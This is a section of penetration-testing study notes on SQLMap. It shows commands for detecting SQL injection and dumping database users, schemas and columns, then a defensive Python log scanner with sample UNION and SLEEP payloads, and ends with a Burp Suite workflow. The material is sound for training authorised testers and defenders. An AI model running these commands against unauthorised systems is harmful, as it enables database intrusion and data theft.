5.4.6 SQLMap
SQLMap is a powerful open-source penetration testing tool designed to automate the process of detecting and exploiting SQL injection flaws in web applications. It simplifies the identification and exploitation of SQL vulnerabilities, making it a widely used tool in the field of penetration testing.
Basic Syntax
Detecting SQL Injection: To use SQLMap, provide the tool with the vulnerable URL and the parameter to test for SQL injection. For example:
$ sqlmap -u "http://victim.site/view.php?id=1141" -p id --technique=U
This command tells SQLMap to test the id parameter of a GET request for view.php using a Union-based SQL injection technique.
Handling POST Parameters: If the injection involves a POST parameter, the syntax would be:
$ sqlmap -u <URL> --data=<POST string> -p parameter [options]
You can write the POST string manually or copy it from a request intercepted with Burp Proxy.
Using Request Files: Save a request intercepted with Burp Proxy to a file and specify it on the command line:
$ sqlmap -r <request file> -p parameter [options]
Extracting Information
Database Banner: The --banner switch grabs the database banner, which confirms the injection and gives proof of exploitability to include in reports:
$ sqlmap -u <target> --banner <other options>
Information Gathering:
List users of the database:
$ sqlmap -u <target> --users <other options>
Check if the web application database user is a database administrator:
$ sqlmap -u <target> --is-dba <other options>
Database and Schema Extraction:
List all available databases:
$ sqlmap -u <target> --dbs <other options>
Choose a database and list its tables:
$ sqlmap -u <target> -D <database> --tables <other options>
Choose tables and list their columns:
$ sqlmap -u <target> -D <database> -T <tables, comma separated list> --columns <other options>
Dump specific columns:
$ sqlmap -u <target> -D <database> -T <tables> -C <columns list> --dump <other options>
SQLMap Advanced Usage
Forcing the DBMS: Specify the DBMS to help shorten the detection phase:
$ sqlmap --dbms=<DBMS> ...
Available DBMS options include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and more.
Fine-Tuning Payloads: Use --string and --not-string to handle changes in application output. For example:
$ sqlmap -u 'http://localhost/ecommerce.php?id=1' --string "nokia" <other switches>
Utilize --prefix and --suffix for structured POST parameters.
Aggressiveness and Load:
Use --level to test headers and increase the number of columns tested for in-band exploitation.
Use --risk to adjust the aggressiveness of injections. Higher risk levels enable more dangerous injections.
Connection Management:
Use --keep-alive for persistent connections:
$ sqlmap -u <target> --keep-alive <other commands>
Use --threads to exploit injections with parallel threads:
$ sqlmap -u <target> --technique=B --threads 7 <other commands>
SQL Injections are powerful but can be destructive; hence, ethical hacking requires careful consideration.
Understanding the tools and their options is crucial for successful and responsible penetration testing.
SQLMap provides advanced command-line switches for fine-tuning and optimizing the exploitation process.
Always exercise caution to avoid damaging the client's infrastructure and follow ethical hacking practices.
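Seen from the defending side, the switches above leave traces in the web server's access log: sqlmap's default User-Agent header names the tool, and the union- and time-based payloads become readable once the query string is URL-decoded. The following is an added example (not part of these notes) that scans combined-format access-log lines for both indicators; the log lines, IP addresses and the exact User-Agent string are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format (not real traffic). Line 2 carries a
# sqlmap-style User-Agent plus a UNION payload; line 3 has a browser-like agent but a time-based payload.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2024:12:00:01 +0000] "GET /view.php?id=1141 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2024:12:00:02 +0000] "GET /view.php?id=1141%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL-- HTTP/1.1" 200 5123 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
203.0.113.7 - - [10/May/2024:12:00:03 +0000] "GET /view.php?id=1141%29%20AND%20SLEEP%285%29-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [10/May/2024:12:00:04 +0000] "GET /view.php?id=7 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# SQL fragments that union-, time-based and schema-enumeration payloads rely on.
PAYLOAD_RE = re.compile(
    r"\b(union\s+(all\s+)?select|sleep\s*\(|benchmark\s*\(|waitfor\s+delay|information_schema)",
    re.I,
)

def scan_access_log(text):
    """Return one finding per suspicious request: decoded path and why it was flagged."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-log format; skip rather than guess
        # Decode twice: payloads are URL-encoded, and some stacks encode them again.
        decoded = unquote_plus(unquote_plus(m["path"]))
        reasons = []
        if m["ua"].lower().startswith("sqlmap/"):
            reasons.append("sqlmap user-agent")
        if PAYLOAD_RE.search(decoded):
            reasons.append("sqli payload in query")
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "path": decoded, "reasons": reasons})
    return findings

def hits_per_source(findings):
    """Count flagged requests per client IP; one scan shows up as a burst from one source."""
    return Counter(f["ip"] for f in findings)

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["path"], "->", ", ".join(f["reasons"]))
```

Because the User-Agent can be changed by the scanner, the payload check on the decoded query string is the indicator to rely on; the User-Agent match is only a convenient confirmation.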
BurpSuite & SQLMap
A great way to find out if a SQLi vulnerability is present is to use a web proxy such as BurpSuite, capture the traffic, and save the captured file locally (.xml).
We will then feed that file to SQLMap and check whether the request is injectable.
sqlmap -r sql_request_captured.xml